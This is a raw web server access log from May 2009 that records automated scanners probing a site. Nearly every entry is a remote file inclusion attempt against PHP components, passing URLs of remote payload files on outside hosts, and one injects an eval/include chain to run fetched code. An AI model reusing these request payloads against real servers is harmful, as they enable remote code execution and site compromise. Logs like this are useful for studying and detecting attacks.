87.106.135.14 - - [15/May/2009:00:27:17 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
87.106.135.14 - - [15/May/2009:00:27:17 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
58.227.193.198 - - [15/May/2009:00:27:33 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:27:33 -0400] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:27:33 -0400] "GET /logs/access_log.Q109050700//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:27:45 -0400] "GET /logs/access_log.Q109050700%20%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:28:24 -0400] "GET /logs/access_log.Q108100500//admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:28:24 -0400] "GET /logs/access_log.Q108083100//admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:28:27 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:28:27 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.221.119.126 - - [15/May/2009:00:28:29 -0400] "GET /logs/access_log.Q109050700%20%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
63.230.8.4 - - [15/May/2009:00:28:29 -0400] "GET //components/errors.php?error=http://www.sysweb.it/gif/cmd.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
74.52.164.18 - - [15/May/2009:00:28:29 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
74.52.164.18 - - [15/May/2009:00:28:29 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
74.52.164.18 - - [15/May/2009:00:28:29 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
72.52.230.168 - - [15/May/2009:00:28:57 -0400] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:28:57 -0400] "GET /logs/access_log.Q108083000//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:28:57 -0400] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:29:04 -0400] "GET /logs/access_log.Q108100900//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:29:19 -0400] "GET /logs/error_log.Q108083000//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.143.81.26 - - [15/May/2009:00:29:26 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.143.81.26 - - [15/May/2009:00:29:26 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 200 1423 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
72.52.230.168 - - [15/May/2009:00:29:32 -0400] "GET /logs/error_log.Q108112600//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:29:33 -0400] "GET /logs/access_log.Q108120300//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.172.92.14 - - [15/May/2009:00:29:33 -0400] "GET /logs/error_log.Q109042000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
200.58.119.65 - - [15/May/2009:00:29:35 -0400] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:29:35 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:29:35 -0400] "GET /logs/access_log.Q109030500//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:29:45 -0400] "GET /logs/error_log.Q109021800//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:29:45 -0400] "GET /logs/access_log.Q109032000//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [15/May/2009:00:29:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.52.230.168 - - [15/May/2009:00:29:47 -0400] "GET /logs/access_log.Q108082100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:29:51 -0400] "GET /logs/error_log.Q108120300//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
87.106.135.14 - - [15/May/2009:00:29:52 -0400] "GET /logs/error_log.Q109042000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.52.230.168 - - [15/May/2009:00:29:59 -0400] "GET /logs/access_log.Q108101100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:30:00 -0400] "GET /logs/error_log.Q108082100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.18.76.16 - - [15/May/2009:00:30:10 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
217.18.76.16 - - [15/May/2009:00:30:10 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
217.18.76.16 - - [15/May/2009:00:30:10 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
72.52.230.168 - - [15/May/2009:00:30:26 -0400] "GET /logs/error_log.Q108071000//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:30:26 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:30:26 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:30:26 -0400] "GET /logs/access_log.Q109041200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:30:30 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:30:30 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:30:30 -0400] "GET /logs/access_log.Q109041200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.18.76.16 - - [15/May/2009:00:30:32 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
217.18.76.16 - - [15/May/2009:00:30:32 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
217.18.76.16 - - [15/May/2009:00:30:33 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
67.43.5.67 - - [15/May/2009:00:30:34 -0400] "GET /logs/?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 1418 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:30:34 -0400] "GET /?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
217.18.76.16 - - [15/May/2009:00:30:34 -0400] "GET /logs/error_log.Q109042000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
74.52.164.18 - - [15/May/2009:00:30:40 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
74.52.164.18 - - [15/May/2009:00:30:40 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
74.52.164.18 - - [15/May/2009:00:30:40 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
123.143.98.5 - - [15/May/2009:00:30:42 -0400] "GET /logs/access_log.Q108120100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:30:42 -0400] "GET /logs/access_log.Q108120100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:30:55 -0400] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:30:55 -0400] "GET /logs/access_log.Q108083000//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:30:55 -0400] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:31:00 -0400] "GET /logs/access_log.Q108083000%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:31:04 -0400] "GET /logs/error_log.Q108083000%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:31:13 -0400] "GET /logs/error_log.Q108112600%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:31:19 -0400] "GET /logs/access_log.Q108120300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:31:20 -0400] "GET /logs/access_log.Q108082100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:31:20 -0400] "GET /logs/error_log.Q109021800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:31:21 -0400] "GET /logs/error_log.Q108120300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
69.94.30.156 - - [15/May/2009:00:31:31 -0400] "GET /logs/access_log.Q109020500/errors.php?error=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
69.94.30.156 - - [15/May/2009:00:31:31 -0400] "GET /errors.php?error=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
69.94.30.156 - - [15/May/2009:00:31:31 -0400] "GET /logs/errors.php?error=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
72.52.230.168 - - [15/May/2009:00:31:44 -0400] "GET /logs/access_log.Q108101100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:31:44 -0400] "GET /logs/error_log.Q108082100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
69.94.30.156 - - [15/May/2009:00:31:49 -0400] "GET /logs/access_log.Q108112900/errors.php?error=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
72.52.230.168 - - [15/May/2009:00:31:51 -0400] "GET /logs/access_log.Q109032800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:31:54 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/ask_password.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:31:57 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:31:57 -0400] "GET /logs/access_log.Q108120700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:32:02 -0400] "GET /logs/error_log.Q108083000//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:32:07 -0400] "GET /logs/error_log.Q108112600//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:32:11 -0400] "GET /logs/access_log.Q108120300//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:32:11 -0400] "GET /logs/error_log.Q109021800//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:32:11 -0400] "GET /logs/access_log.Q108082100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:32:13 -0400] "GET /logs/access_log.Q109041200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:32:18 -0400] "GET /logs/access_log.Q108120100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:32:20 -0400] "GET /logs/access_log.Q109021800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:32:26 -0400] "GET /logs/error_log.Q108101100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:32:26 -0400] "GET /logs/error_log.Q109032800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:32:27 -0400] "GET /logs/access_log.Q109041200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:32:32 -0400] "GET /logs/access_log.Q108120100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:32:34 -0400] "GET /logs/error_log.Q108051900%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:32:40 -0400] "GET /logs/access_log.Q108080900%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:32:45 -0400] "GET /?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:32:46 -0400] "GET /logs/?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 1418 "-" "Mozilla/5.0"
74.53.29.34 - - [15/May/2009:00:32:46 -0400] "GET /logs/access_log.Q109010300 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1)LookThereItIs.Com/20061010 Firefox/2.0"
72.52.230.168 - - [15/May/2009:00:32:48 -0400] "GET /logs/error_log.Q108051800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:32:49 -0400] "GET /logs/error_log.Q108120300//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:32:54 -0400] "GET /logs/access_log.Q108101100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:32:54 -0400] "GET /logs/error_log.Q108082100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:32:55 -0400] "GET /logs/error_log.Q108070900%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:33:10 -0400] "GET /logs/error_log.Q108071000//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.143.81.26 - - [15/May/2009:00:33:11 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 200 1425 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
83.143.81.26 - - [15/May/2009:00:33:13 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 200 454 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
58.227.193.198 - - [15/May/2009:00:33:22 -0400] "GET /logs/access_log.Q108083000%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:33:24 -0400] "GET /?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:33:24 -0400] "GET /logs/?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 1418 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:26 -0400] "GET /logs/access_log.Q109030500%20%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
217.18.76.16 - - [15/May/2009:00:33:29 -0400] "GET /logs/access_log.Q108083100//include/admin.lib.inc.php?site_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
200.58.119.65 - - [15/May/2009:00:33:32 -0400] "GET /logs/access_log.Q109032000%20%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.43.5.67 - - [15/May/2009:00:33:34 -0400] "GET /logs/access_log.Q108100600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:33:35 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [15/May/2009:00:33:37 -0400] "GET /logs/?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 1418 "-" "Mozilla/5.0"
218.249.36.194 - - [15/May/2009:00:33:37 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
